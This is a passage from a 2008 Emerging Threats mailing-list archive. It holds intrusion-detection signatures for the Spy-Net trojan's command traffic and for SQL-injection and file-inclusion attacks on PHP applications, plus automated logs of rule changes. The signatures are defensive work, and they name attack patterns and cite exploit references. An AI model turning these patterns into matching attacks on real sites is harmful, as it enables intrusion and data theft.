(NATs/proxies). You can > usually deduce the header and values based on the one for one character > regex, assuming both header name and values are common/rfc defined. > > W > > ---- > William Salusky (via mobile device) William.Salusky at corp.aol.com > Principal Tech Security Engineer > (Office) 703-265-4924 - (mobile) 571-480-1933 > > ------------------------------------------------------------------------ > *From*: emerging-sigs-bounces at emergingthreats.net > *To*: emerging-sigs at emergingthreats.net > *Sent*: Thu Oct 09 12:59:33 2008 > *Subject*: [Emerging-Sigs] [Fwd: Suspicious HTTP header] > > Several people have replied to me offline and I appreciate their > response. However, I haven't explained what the concern was, my > apologies. I'm not concerned with the Host field (2o7.net) but rather > the header consisting of dashes. Does anyone know if this is malicious > in nature or some legit app? > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > > -------- Forwarded Message -------- > *From*: dxp > > *To*: emerging-sigs at emergingthreats.net > > *Subject*: Suspicious HTTP header > *Date*: Wed, 08 Oct 2008 16:53:14 -0400 > > I've been seeing web requests with strange header in them, has anyone > seen this or know what this is? > > --- snip --- > Accept: */* > Accept-Language: en-us > --------: -------- -------- > Host: xxx.2o7.net > Connection: Keep-Alive > --- snip --- > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jgimer at gmail.com Thu Oct 9 18:38:33 2008 From: jgimer at gmail.com (Joshua Gimer) Date: Thu, 9 Oct 2008 16:38:33 -0600 Subject: [Emerging-Sigs] Emerging IPTables Update Script Update Message-ID: I just updated the Emerging IPTables update script. There were a lot of issues with the old one, it is almost a complete rewrite. Changes in Version 2.0 - Added Syslog support - Added IP address verification - Added individual IP address and CIDR range white-listing support You can get the new version from http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules Any feedback is always welcome. -- Thx Joshua Gimer -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081009/4cab793d/attachment.html From jonkman at jonkmans.com Thu Oct 9 21:37:27 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 09 Oct 2008 21:37:27 -0400 Subject: [Emerging-Sigs] Spy-Net Trojan In-Reply-To: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu> References: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu> Message-ID: <48EEB1D7.5000203@jonkmans.com> Added, great sigs, sorry for the delay posting. Lost in the inbox. :) matt Campesi, Christopher wrote: > Another Trojan I downloaded. > > Server seems to be 1024+ however the client portion can have any port > the person wants it to operate on. > > > > This one is the initial connection before information about the type of > OS is sent. Between the two contents seems to be a random 3 digit number. > > > > alert tcp $EXTERNAL_NET any -> $HOME_NET 1024:65535 (msg:"Spy-Net Trojan > Connection";content:"maininfo|7c|";offset:0;depth:9;content:"|7c|";distance:3;classtype:trojan-activity;sid:XXXXXX;rev:1;) > > > > This one is lets the client know the server is connected and ready > > > > alert tcp $HOME_NET 1024:65535 -> $EXTERNAL_NET any (msg:"Spy-Net Trojan > Connection (2)";flags:PA;content:"conectado|7c > 0a|";offset:0;depth:11;classtype:trojan-activity;sid:XXXXX;rev:1;) > > > > *Christopher* > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Fri Oct 10 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 10 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081010200008.55B5245026@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Oct 10 16:00:08 2008 [***] [+++] Added rules: [+++] 2008643 - ET MALWARE Suspicious User-Agent Detected (Downloader1.2) (emerging-malware.rules) 2008644 - ET TROJAN Spy-Net Trojan Connection (emerging-virus.rules) 2008645 - ET TROJAN Spy-Net Trojan Connection (2) (emerging-virus.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2008647 - ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) (emerging-malware.rules) [///] Modified active rules: [///] 2001980 - ET POLICY SSH Client Banner Detected on Unusual Port (emerging-policy.rules) 2008564 - ET MALWARE Suspicious User-Agent (Internet HTTP Request) (emerging-malware.rules) 2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (5): 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) -> Added to emerging-sid-msg.map.txt (5): 2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2) 2008644 || ET TROJAN Spy-Net Trojan Connection 2008645 || ET TROJAN Spy-Net Trojan Connection (2) 2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159 2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) -> Added to emerging-virus.rules (1): #This one is lets the client know the server is connected and ready -> Added to emerging.rules (1): # fake email for MS Updates results in a trojan that uses this fake UA From signatures at stillsecure.com Sat Oct 11 06:11:52 2008 From: signatures at stillsecure.com (signatures) Date: Sat, 11 Oct 2008 04:11:52 -0600 Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-11-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com> Hi Matt, Please find 5 new signatures below: 1. PHP Autos catid SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Autos catid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/searchresults.php?catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6696; reference:url,secunia.com/advisories/32139/; sid:8436; rev:1;) 2.PHP Realtor v_cat SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Realtor v_cat SQL Injection";flow:established,to_server; content:"GET "; depth:4; uricontent:"/view_cat.php?v_cat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6694; reference:url,secunia.com/advisories/32149/; sid:8437; rev:1;) 3.JMweb MP3 src Multiple Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"JMweb MP3 src Multiple Local File Inclusion"; flow:established,to_server; content:"GET "; depth:4; pcre:"/(listen.php|download.php)/"; uricontent:"?src="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6669; sid:8438; rev:1;) 4. ScriptsEz Easy Image Downloader id File Disclosure alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ScriptsEz Easy Image Downloader id File Disclosure"; flow:established,to_server; content:"GET "; depth:4; uricontent:"main.php?action=download"; nocase; uricontent:"&id="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6715; reference:url,secunia.com/Advisories/32210/; sid:8439; rev:1;) 5.Built2go Real Estate Listings event_id SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Built2go Real Estate Listings event_id SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/event_detail.php?event_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6697; reference:url,secunia.com/Advisories/32129/; sid:8440; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081011/488b17bc/attachment.html From jonkman at jonkmans.com Sat Oct 11 10:53:29 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Sat, 11 Oct 2008 10:53:29 -0400 Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-11-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com> Message-ID: <48F0BDE9.1050803@jonkmans.com> Great stuff guys! Posting now. Matt signatures wrote: > Hi Matt, > > > > Please find 5 new signatures below: > > > > *1. PHP Autos catid SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Autos > catid SQL Injection"; flow:established,to_server; content:"GET "; > depth:4; uricontent:"/searchresults.php?catid="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6696; > reference:url,secunia.com/advisories/32139/; sid:8436; rev:1;) > > > > *2.PHP Realtor v_cat SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP > Realtor v_cat SQL Injection";flow:established,to_server; content:"GET "; > depth:4; uricontent:"/view_cat.php?v_cat="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6694; > reference:url,secunia.com/advisories/32149/; sid:8437; rev:1;) > > > > *3.JMweb MP3 src Multiple Local File Inclusion* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"JMweb MP3 > src Multiple Local File Inclusion"; flow:established,to_server; > content:"GET "; depth:4; pcre:"/(listen.php|download.php)/"; > uricontent:"?src="; nocase; pcre:"/(\.\.\/){1,}/"; > classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6669; sid:8438; rev:1;) > > > > *4. ScriptsEz Easy Image Downloader id File Disclosure* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ScriptsEz > Easy Image Downloader id File Disclosure"; flow:established,to_server; > content:"GET "; depth:4; uricontent:"main.php?action=download"; nocase; > uricontent:"&id="; nocase; pcre:"/(\.\.\/){1,}/"; > classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6715; > reference:url,secunia.com/Advisories/32210/; sid:8439; rev:1;) > > > > *5.Built2go Real Estate Listings event_id SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Built2go > Real Estate Listings event_id SQL Injection"; > > flow:established,to_server; content:"GET "; depth:4; > uricontent:"/event_detail.php?event_id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.milw0rm.com/exploits/6697; > reference:url,secunia.com/Advisories/32129/; sid:8440; rev:1;) > > > Looking forward for your comments if any... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Sat Oct 11 16:00:09 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 11 Oct 2008 16:00:09 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081011200009.0414045026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 11 16:00:08 2008 [***] [+++] Added rules: [+++] 2008648 - ET WEB_SPECIFIC trac q variable open redirect (emerging-web_sql_injection.rules) 2008649 - ET WEB_SPECIFIC Realtor v_cat SQL Injection (emerging-web_sql_injection.rules) 2008650 - ET WEB_SPECIFIC Autos catid SQL Injection (emerging-web_sql_injection.rules) 2008651 - ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion (emerging-web_sql_injection.rules) 2008652 - ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure (emerging-web_sql_injection.rules) 2008653 - ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (6): 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 -> Added to emerging-sid-msg.map.txt (6): 2008648 || ET WEB_SPECIFIC trac q variable open redirect || url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951 2008649 || ET WEB_SPECIFIC Realtor v_cat SQL Injection || url,secunia.com/advisories/32149/ || url,www.milw0rm.com/exploits/6694 2008650 || ET WEB_SPECIFIC Autos catid SQL Injection || url,secunia.com/advisories/32139/ || url,www.milw0rm.com/exploits/6696 2008651 || ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion || url,www.milw0rm.com/exploits/6669 2008652 || ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure || url,secunia.com/Advisories/32210/ || url,www.milw0rm.com/exploits/6715 2008653 || ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection || url,secunia.com/Advisories/32129/ || url,www.milw0rm.com/exploits/6697 -> Added to emerging-web_sql_injection.rules (1): #by Russ McRee [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (10): 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (10): 2500067 || ET COMPROMISED Known Compromised or Hostile Host Traffic (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500068 || ET COMPROMISED Known Compromised or Hostile Host Traffic (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500069 || ET COMPROMISED Known Compromised or Hostile Host Traffic (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500070 || ET COMPROMISED Known Compromised or Hostile Host Traffic (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500071 || ET COMPROMISED Known Compromised or Hostile Host Traffic (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510067 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (68) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510068 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (69) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510069 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (70) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510070 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (71) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510071 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (72) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 11 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 11 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081011220008.2562345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 11 18:00:08 2008 [***] [+++] Added rules: [+++] 2008546 - ET TROJAN Downloader.vr Checkin part 1 of 2 (emerging-virus.rules) 2008618 - ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS (emerging-dos.rules) 2008619 - ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow (emerging-exploit.rules) 2008620 - ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method (emerging-exploit.rules) 2008621 - ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS (emerging-exploit.rules) 2008622 - ET WEB Pritlog index.php filename File Disclosure (emerging-web.rules) 2008623 - ET TROJAN Cinmus.Checkin 1 (emerging-virus.rules) 2008624 - ET TROJAN Cinmus.Checkin 2 (emerging-virus.rules) 2008625 - ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) (emerging-p2p.rules) 2008626 - ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report (emerging-virus.rules) 2008627 - ET SCAN Httprecon Web Server Fingerprint Scan (emerging-scan.rules) 2008628 - ET SCAN WSFuzzer Web Application Fuzzing (emerging-scan.rules) 2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules) 2008639 - ET TROJAN Tibs Trojan Downloader (emerging-virus.rules) 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) 2008641 - ET SCAN sipscan probe (emerging-voip.rules) 2008642 - ET TROJAN Keylogger PRO GOLD Post (emerging-virus.rules) 2008643 - ET MALWARE Suspicious User-Agent Detected (Downloader1.2) (emerging-malware.rules) 2008644 - ET TROJAN Spy-Net Trojan Connection (emerging-virus.rules) 2008645 - ET TROJAN Spy-Net Trojan Connection (2) (emerging-virus.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2008647 - ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) (emerging-malware.rules) 2008648 - ET WEB_SPECIFIC trac q variable open redirect (emerging-web_sql_injection.rules) 2008649 - ET WEB_SPECIFIC Realtor v_cat SQL Injection (emerging-web_sql_injection.rules) 2008650 - ET WEB_SPECIFIC Autos catid SQL Injection (emerging-web_sql_injection.rules) 2008651 - ET WEB_SPECIFIC JMweb MP3 src Multiple Local File Inclusion (emerging-web_sql_injection.rules) 2008652 - ET WEB_SPECIFIC ScriptsEz Easy Image Downloader id File Disclosure (emerging-web_sql_injection.rules) 2008653 - ET WEB_SPECIFIC Built2go Real Estate Listings event_id SQL Injection (emerging-web_sql_injection.rules) 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules) 2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules) 2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules) 2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2001980 - ET POLICY SSH Client Banner Detected on Unusual Port (emerging-policy.rules) 2002916 - ET EXPLOIT RealVNC Authentication Bypass Attempt (emerging-exploit.rules) 2003466 - ET WEB PHP Attack Tool Morfeus F Scanner (emerging-web.rules) 2008415 - ET SCAN Cisco Torch IOS HTTP Scan (emerging-scan.rules) 2008564 - ET MALWARE Suspicious User-Agent (Internet HTTP Request) (emerging-malware.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules) 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network Monitored 